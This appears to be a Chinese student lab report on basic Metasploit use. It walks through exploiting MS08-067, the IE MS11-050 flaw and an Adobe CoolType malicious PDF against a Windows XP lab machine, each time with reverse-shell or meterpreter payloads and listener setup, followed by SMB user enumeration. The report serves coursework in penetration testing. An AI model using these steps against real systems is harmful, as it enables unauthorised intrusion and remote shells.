20145330 《网络攻防》 MSF基础应用
20145330 《网络攻防》 MSF基础应用
1.实验后回答问题
(1)用自己的话解释什么是exploit,payload,encode.
- exploit:进行渗透攻击的模块合集
- payload:相当于shellcode,攻击载荷
- encode:对所需传输文件进行编码,达到免杀目的
2.实验总结与体会
这次实验完成的并不算十分顺利...问题主要在于靶机的选择与电脑CPU的运行速度...真的是很能磨练人的耐心与毅力,好处就是可以多练习熟悉攻击的过程,对知识的掌握更加牢固。让我度过了一个难忘的生日...
3.实验过程
1. MS08_067安全漏洞渗透攻击实践
实验前先查看kali与靶机是否可以ping通
靶机为我这次新拷的WinXPenSP3(将网络调制NAT模式,否则ping不通啊)
ping这里我还在控制面板-网络连接-本地连接-属性下修改了tcp-ip使与我kali IP一致才ping通,这其中需要摸索尝试。
1、输入msfconsole
进入msf
,首先使用search
命令搜寻有关漏洞MS08_067的相关信息
2、进入该漏洞模块的使用(use exploit/windows/smb/ms08_067_netapi)
3、输入命令show payload
会显示出有效的攻击载荷,找到一个比如shell_reverse_tcp。
4、show targets
会显示出可以被攻击的靶机的操作系统型号,这里我们默认选择0采用自动选取
5、接下来设置攻击有效载荷(set payload generic/shell_reverse_tcp)
6、输入show options
显示我们需要在攻击前需要设置的数据,将靶机IP(RHOST)与kali IP(LHOST)进行设置
7、输入exploit
开始攻击
第一次尝试失败。
在经过多次尝试后终于成功:
总结一下我自己出现的问题,试了很多次。首先要查看是否能ping通,还有kali的IP可能一直不变但正好这次就变了所以要提前ifconfig一下。靶机的网络设置也要设成NAT。有些问题往往是自己觉得已经配置好了的,所以排除问题时还应考虑在内。
8、在kali上执行ipconfig/all:
靶机下执行同样指令测试获取成功:
2. IE浏览器渗透攻击——MS11050安全漏洞
实验前准备:设置虚拟机网络为NAT模式,保证两台虚拟机可以相互间ping通(关闭靶机防火墙)。
1、在kali终端开启msfconsole,输入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,进入该漏洞模块。
2、输入info查看信息:
3、设置对应的载荷set payload windows/meterpreter/reverese_tcp;
4、show options查看需要设置的相关信息:
5、设置相关信息:set LHOST ‘kali Ip’
set LPORT 5330
set URIPATH baidu
6、exploit,有靶机需要访问的ip地址:
7、在靶机IE上输入网址,并在靶机上查看信息。
第一次尝试失败,后分析原因是靶机不匹配,于是更换靶机重新尝试成功(所以端口号什么就换了)
8、可以看见kali中显示一个session 1已经创建:
9、直接回车一下后,输入命令sessions -i 1,开始连接,输入shell成功获取shell
3. Adobe阅读器渗透攻击
1、在kali终端中开启msfconsole。
2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
3、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
4、输入命令show options显示我们需要在攻击前需要设置的数据
5、输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
6、使用use exploit/multi/handler新建一个监听模块
7、使用set payload windws/meterpreter/reverse_tcp建立一个反向连接,设置set LPORT 5330
8、使用命令exploit开始攻击,在xp中打开pdf。同时kali会显示连接成功的结果。
9、输入shell获取靶机信息
10、在靶机xp中使用命令netstat -an,看本地tcp连接。
4、 辅助模块--scanner/http/dir_listing
1、先用search了解一下有关scanner/http/dir_listing的相关信息
2、设置相关参数(info)
3、run运行成功
感觉有些不清楚辅助模块功能于是我又找了一个尝试
辅助模块--auxiliary/scanner/smb/smb_enumusers
功能:枚举系统上的用户
20145330 《网络攻防》 MSF基础应用的更多相关文章
- 20145306 张文锦 网络攻防 web基础
20145306 网络攻防 web基础 实验内容 WebServer:掌握Apache启停配置修改(如监听端口)前端编程:熟悉HTML+JavaScript.了解表单的概念编写不同的HTML网页,放入 ...
- 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用
- 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...
- 2018-2019-2 20165336《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165336<网络攻防技术>Exp5 MSF基础应用 一.攻击实例 主动攻击的实践 ms08_067(成功) payload/generic/shell_rev ...
- 2018-2019-2 20165312《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165312<网络攻防技术>Exp5 MSF基础应用 目录 一.知识点总结 二.攻击实例 主动攻击的实践 ms08_067 payload/generic/sh ...
- 2018-2019-2 20165315《网络攻防技术》Exp5 MSF基础应用
2018-2019-2 20165315<网络攻防技术>Exp5 MSF基础应用 目录 一.实验内容 二.实验步骤 1.一个主动攻击实践 ms08_067(成功) 2.一个针对浏览器的攻击 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
随机推荐
- 为什么面试要问 hashmap 的原理
我们都知道哪里要用HashMap,知道Hashtable和HashMap之间的区别,那么为何这道面试题如此特殊呢?是因为这道题考察的深度很深.这题经常出现在高级或中高级面试中.投资银行更喜欢问这个问题 ...
- jquery on事件jquery on实现绑定多个事件
API上jquery on介绍 on(events,[selector],[data],fn) 概述 在选择元素上绑定一个或多个事件的事件处理函数. on()方法绑定事件处理程序到当前选定的jQuer ...
- linux 启动过程关键点
Freeing init memory: 4568K init... Freeing init memory 后,就是开始init进程
- 数据结构——栈(C语言实现)
#include <stdio.h> #include <stdlib.h> #include<string.h> #include<malloc.h> ...
- Python requests 301/302/303重定向(跨域/本域)cookie、Location问题
今天使用request的get方法获取一个网站的登录页信息,结果使用charles抓包的时候发现该网站登录页303(重定向的问题),网上查了很多资料,原因如下: 一.cookie 原因:利用reque ...
- Linux计划任务Crontab学习笔记
1 http://www.jb51.net/LINUXjishu/345698.html 2 http://www.jb51.net/LINUXjishu/345705.html 3 http: ...
- Linux替换字符串
sed命令批量替换多个文件中的字符串: 命令:sed -i “s/原字符串/新字符串/g” `grep 原字符串 -rl 所在目录` 例如:我要把 xy 替换为 mn,执行命令: sed -i “s/ ...
- 在ios上时间无法parse返回 "Invalid Date"
百度搜索:" ios 上面 new date" 关键字 BUG 描述直接上原码 var psrseDate = Date.parse("2010-03-15 10:30: ...
- Spark DataFrame vector 类型存储到Hive表
1. 软件版本 软件 版本 Spark 1.6.0 Hive 1.2.1 2. 场景描述 在使用Spark时,有时需要存储DataFrame数据到Hive表中,一般的存储方式如下: // 注册临时表 ...
- Spark Core(四)用LogQuery的例子来说明Executor是如何运算RDD的算子(转载)
1. 究竟是怎么运行的? 很多的博客里大量的讲了什么是RDD, Dependency, Shuffle.......但是究竟那些Executor是怎么运行你提交的代码段的? 下面是一个日志分析的例子, ...